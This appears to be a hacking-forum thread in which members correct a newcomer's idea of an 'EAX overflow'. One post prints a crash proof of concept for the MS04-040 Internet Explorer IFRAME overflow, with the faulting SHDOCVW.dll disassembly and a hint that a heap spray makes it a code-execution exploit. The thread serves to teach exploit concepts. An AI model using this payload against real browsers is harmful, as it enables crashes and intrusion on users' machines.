Results 1 to 10 of 10

Thread: EAX overflow(An Idea) Share/Save - My123World.Com!

  1. #1
    Garage Member
    Join Date
    Jun 2012
    Location
    Unkn0wn City,Unkn0wn State,Unkn0wn Country,Unkn0wn Continent,PLanet Eart,Milkyway Galaxy,Virgo Super
    Posts
    51

    EAX overflow(An Idea)

    Hello to all Garagians yesterday I got an Idea what about doing EAX overflow I just wanted to know what do you think about this IDEA ....



    Your questions,comments,suggestions,etc....are welcome

  2. #2
    Garage Member
    Join Date
    Sep 2010
    Location
    Chennai
    Posts
    83
    Blog Entries
    1
    Be more elaborate! There is no such thing as a register overflow (except arithmetic overflow..but they are not relevant to our discussion here) , what actually happens is that we overflow the memory from where the register gets these values! So yeah, it doesn't matter if it is EAX or EBX or whatever as long as the condition facilitate code execution!
    Quote Originally Posted by H@CK3R_ADI View Post
    Hello to all Garagians yesterday I got an Idea what about doing EAX overflow I just wanted to know what do you think about this IDEA ....



    Your questions,comments,suggestions,etc....are welcome

  3. #3
    EAX (or any register) is a kind of bucket, we sink it in a big tank no matter how much it is filled (or even overflowed), then take it out, it will be containing only the fixed volume every time at the most no matter how long u keep it inside the tank.

    Kindly specify, how you want to overflow EAX otherwise?

  4. #4
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Well I think what you are trying convey is , you tried some fuzzing and app crashed with EAX register overflown !!!. Any way sebas has explained where you are wrong .

    The general idea is get control of the program flow by taking control over some instruction via a controlled register .

    Check out this exploit.

    Garage4hackers Forum - dbpwoerammpl local exploit a different scenario

    Cheers.
    Hacking Is a Matter of Time Knowledge and Patience

  5. #5
    Garage Member
    Join Date
    Jun 2012
    Location
    Unkn0wn City,Unkn0wn State,Unkn0wn Country,Unkn0wn Continent,PLanet Eart,Milkyway Galaxy,Virgo Super
    Posts
    51
    what about doing indirect overflow that first load it on regs and then into memory

  6. #6
    Overflowing my memory, elaborate a little more, this could be a new technique or may lead to any zeroday... "vinnu"

  7. #7
    Garage Member
    Join Date
    Jun 2012
    Location
    Unkn0wn City,Unkn0wn State,Unkn0wn Country,Unkn0wn Continent,PLanet Eart,Milkyway Galaxy,Virgo Super
    Posts
    51
    This can be used to bypass security sys(s) just load val in reg then into mem...What do you think........What about use this to execute malicious code

  8. #8
    Garage Member
    Join Date
    Sep 2010
    Location
    Chennai
    Posts
    83
    Blog Entries
    1
    Quote Originally Posted by H@CK3R_ADI View Post
    This can be used to bypass security sys(s) just load val in reg then into mem...What do you think........What about use this to execute malicious code
    Kindly be more elaborate by providing some pseudocode as to how you think it might happen! Then it will be easier for others to clarify

  9. #9
    Eax cant be overflow(becaz ofcourse its a reg and not a mem range) but can be written by bogus values and such exploits already exits not a new concept though one of those a re use after free

    a classical Example would be Microsoft Security Bulletin MS04-040 : Cumulative Security Update for Internet Explorer (889293)


    <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>
    </body>
    </HTML>

    It triggers a crash at SHDOCVW.dll


    769F6D36 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] //parameter overwritter stack
    769F6D39 85C0 TEST EAX,EAX
    769F6D3B ^0F84 45FBFFFF JE SHDOCVW.769F6886
    769F6D41 E9 560E0100 JMP SHDOCVW.76A07B9C
    769F6D46 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
    769F6D4A 8B80 00140000 MOV EAX,DWORD PTR DS:[EAX+1400]
    769F6D50 85C0 TEST EAX,EAX
    769F6D52 0F84 330E0100 JE SHDOCVW.76A07B8B
    769F6D58 FF7424 08 PUSH DWORD PTR SS:[ESP+8]
    769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things gets shaped up ?? works with a heap spray
    769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
    769F6D63 50 PUSH EAX
    769F6D64 FF11 CALL DWORD PTR DS:[ECX]


    Thanks!

  10. #10
    Namaste

    note the instructions:

    Code:
    769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things gets shaped up ?? works with a heap spray
    769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
    769F6D63 50 PUSH EAX
    769F6D64 FF11 CALL DWORD PTR DS:[ECX]
    What else you need? Its a direct code execution vulnerability. and if you control EAX you control ECX and there you are.

    EAX doesnt get any bogus value but user supplied input (directly or indirectly in this case).

    Again registers do not overflow, but only take values according to their volume (bits like 32 bit, 16 bit, 64 bit etc.) and EAX takes a DWORD (all 32 bit- general purpose registers and EAX is a general purpose 32bit register).

    A bucket will always contain fixed volume everytime you fill it completely (upto its maximum limit ) and overflown water will get spilled out of it but not inside the bucket.

    ..."vinnu"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •